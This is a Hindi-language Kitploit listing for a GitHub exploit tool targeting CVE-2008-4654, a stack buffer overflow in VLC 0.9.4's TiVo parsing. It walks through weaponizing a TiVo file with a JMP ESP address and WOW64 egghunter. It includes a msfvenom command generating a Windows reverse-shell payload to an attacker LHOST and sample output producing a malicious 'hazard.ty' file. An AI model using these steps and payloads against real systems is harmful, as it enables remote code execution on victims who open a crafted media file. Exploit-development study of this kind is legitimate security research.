Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2008-4654 — VideoLan के VLC Media Player 0.9.4 में TiVo फ़ाइलों को प्रोसेस करते समय होने वाली स्टैक-आधारित बफर ओवरफ़्लो भेद्यता के लिए एक पूर्णतः कार्यशील शोषण। | Kitploit
उपकरण/GitHubGitHub/hexastrike/cve-2008-4654
भेद्यता विश्लेषणशोषणशेलकोडशेलकोड जनरेशनपेलोड डेवलपमेंटबाइनरी शोषण
GitHubhexastrike/cve-2008-4654

CVE-2008-4654

VideoLan के VLC Media Player 0.9.4 में TiVo फ़ाइलों को प्रोसेस करते समय होने वाली स्टैक-आधारित बफर ओवरफ़्लो भेद्यता के लिए एक पूर्णतः कार्यशील शोषण।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2008-4654

VideoLan के VLC मीडिया प्लेयर 0.9.4 में TiVo फ़ाइलों को संसाधित करते समय स्टैक-आधारित बफर ओवरफ्लो भेद्यता CVE-2008-4654 के लिए एक पूर्णतः कार्यात्मक शोषण। यह 64-बिट विंडोज सिस्टम पर चलने वाली 32-बिट बाइनरी को लक्षित करता है और सीमित स्टैक स्पेस को बायपास करने के लिए WOW64 एगहंटर का उपयोग करता है।

उपयोग

स्क्रिप्ट अपडेट करें:

  • स्क्रिप्ट में प्लेसहोल्डर buf = b'[...]' को अपने स्वयं के शेलकोड (जैसे, msfvenom से) से बदलें।
  • वैकल्पिक रूप से, यदि आप एक अलग टैग चाहते हैं या एक कस्टम एगहंटर है तो EGG_HUNTER_WOW64 शेलकोड को समायोजित करें।
root@kitploit:~
python .\CVE-2008-4654.py --help

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT

Transform a given TiVo file into a weapon with predefined shellcode.

options:
  -h, --help       show this help message and exit
  --input INPUT    Path to the input TiVo file to be weaponized.
  --output OUTPUT  Path where the modified (weaponized) TiVo file will be saved.

यह कैसे काम करता है

  • स्क्रिप्ट TiVo फ़ाइल में एक विशिष्ट बाइट पैटर्न (TIVO_PES_FILEID) खोजती है।
  • यह पैटर्न के 20 बाइट्स बाद के 4-बाइट फ़ील्ड को b"\x00\x00\x00\xff" से ओवरराइट करता है, जो सीमा से बाहर पढ़ने को सेट करता है जिससे स्टैक ओवरफ्लो होता है।
  • फिर यह TIVO_PES_FILEID के 92 बाइट्स बाद के किसी अन्य क्षेत्र को एक कस्टम पेलोड से बदल देता है।
  • पेलोड में शामिल है:
    • एक JMP ESP पता जो निष्पादन को स्टैक की ओर निर्देशित करता है।
    • एक WOW64-विशिष्ट एगहंटर जो w00tw00t मार्कर के लिए मेमोरी स्कैन करता है।
    • मार्कर के बाद, सीमित स्टैक स्पेस से परे, एक बड़ा उपयोगकर्ता-परिभाषित शेलकोड पेलोड (दूसरा चरण) रखा जाता है।
  • जब VLC संशोधित TiVo फ़ाइल को संसाधित करता है, तो यह अंततः ओवरफ्लो को ट्रिगर करता है और एगहंटर को निष्पादित करता है। एगहंटर पूर्ण शेलकोड ढूंढता है और उसे चलाता है, स्टैक आकार की सीमाओं को बायपास करता है।

उदाहरण

पेलोड जनरेशन

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'

TiVo फ़ाइल निर्माण

  • पहले बनाए गए शेलकोड के साथ प्लेसहोल्डर buf = b'[...]' को बदलें।
  • https://samples.mplayerhq.hu/TiVo/ से एक नमूना TiVo फ़ाइल डाउनलोड करें।
root@kitploit:~
PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty

नोट्स

  • यह शोषण केवल x64 विंडोज पर काम करता है क्योंकि इसमें WOW64 एगहंटर का उपयोग किया गया है। शुद्ध x86 दृष्टिकोण के लिए 32-बिट सिस्टम के लिए उपयुक्त एक मानक एगहंटर की आवश्यकता होगी।
  • इस विशिष्ट वेक्टर के लिए \x00 के अलावा कोई प्रमुख बैड कैरेक्टर नहीं हैं, जिससे पेलोड जनरेशन सरल हो जाता है।
  • एगहंटिंग और WOW64 की पेचीदगियों पर गहराई से जानने के लिए Corelan का WOW64 Egghunter लेख और Matt (Skape) Millers का पेपर देखें।

संसाधन

  • https://nostarch.com/bughunter
  • https://nvd.nist.gov/vuln/detail/CVE-2008-4654
  • https://hexastrike.com/resources/blog/exploit-development/vlc-stack-based-buffer-overflow-exploiting-cve-2008-4654-with-a-wow64-egghunter/
  • https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
  • https://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  • https://samples.mplayerhq.hu/TiVo/
टूल डाउनलोड करें